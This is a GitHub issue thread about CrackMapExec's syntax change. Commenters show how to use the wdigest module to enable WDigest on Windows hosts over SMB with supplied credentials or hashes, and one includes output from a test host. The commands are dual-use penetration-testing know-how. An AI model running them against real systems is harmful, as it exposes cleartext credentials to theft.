### ISSUE TITLE
Wdigest not supported?

### ISSUE THREAD

**Issue by tanujain** [byt3bl33d3r/CrackMapExec#276]
## Steps to reproduce

1. I am trying to enable wdigest using "--wdigest enable" parameter but it gives error

## Command string used
crackmapexec smb <ip> -u <username> -p <password> --wdigest enable

## CME verbose output (using the --verbose flag)
unrecognized arguments:  --wdigest enable

## CME Version (cme --version)
4.0.1dev

## OS
kali linux

## Target OS
windows 10

## Detailed issue explanation
Is "--wdigest enable" not supported?
also is there any documentation for new version as I see a lot of examples given on the internet are as per the old version of crackmapexec for example using modules using -m switch which doesn't work now.

**Comment by awsmhacks** [comment]
Not supported. There's a reference guide for smb option's thats for v4.0.1 https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference

**Comment by byt3bl33d3r** [comment]
It's become a module since v4
```cme smb <target> -u administrator -p password -M wdigest -M ACTION=enable```
```cme smb <target> -u administrator -p password -M wdigest -M ACTION=disable```

**Comment by bbucklin95** [comment]
Using that as a command gives an error:
crackmapexec: error: unrecognized arguments: ACTION=enable

Command used: cme smb <target> -u username -d domain -H 'hash' -M wdigest -M action=enable

**Comment by ajkerley628** [comment]
Try the following:

 cme smb -u username -d domain -H 'hash' --module wdigest -o ACTION=enable

**Comment by awsmhacks** [comment]
AJ's should work or keeping with the -M. the use of -o before options is the key
```
(env) root@evilrick:/# cme smb 10.10.33.120 -u user -p Password -M wdigest -o action=enable  
SMB         10.10.33.120    445    SERVER2012-1     [*] Windows Server 2012 R2 Datacenter 9600 x64 (name:SERVER2012-1) (domain:OCEAN) (signing:False) (SMBv1:True)
SMB         10.10.33.120    445    SERVER2012-1     [+] OCEAN\user:Password (Pwn3d!)
WDIGEST     10.10.33.120    445    SERVER2012-1     [+] UseLogonCredential registry key created successfully
```
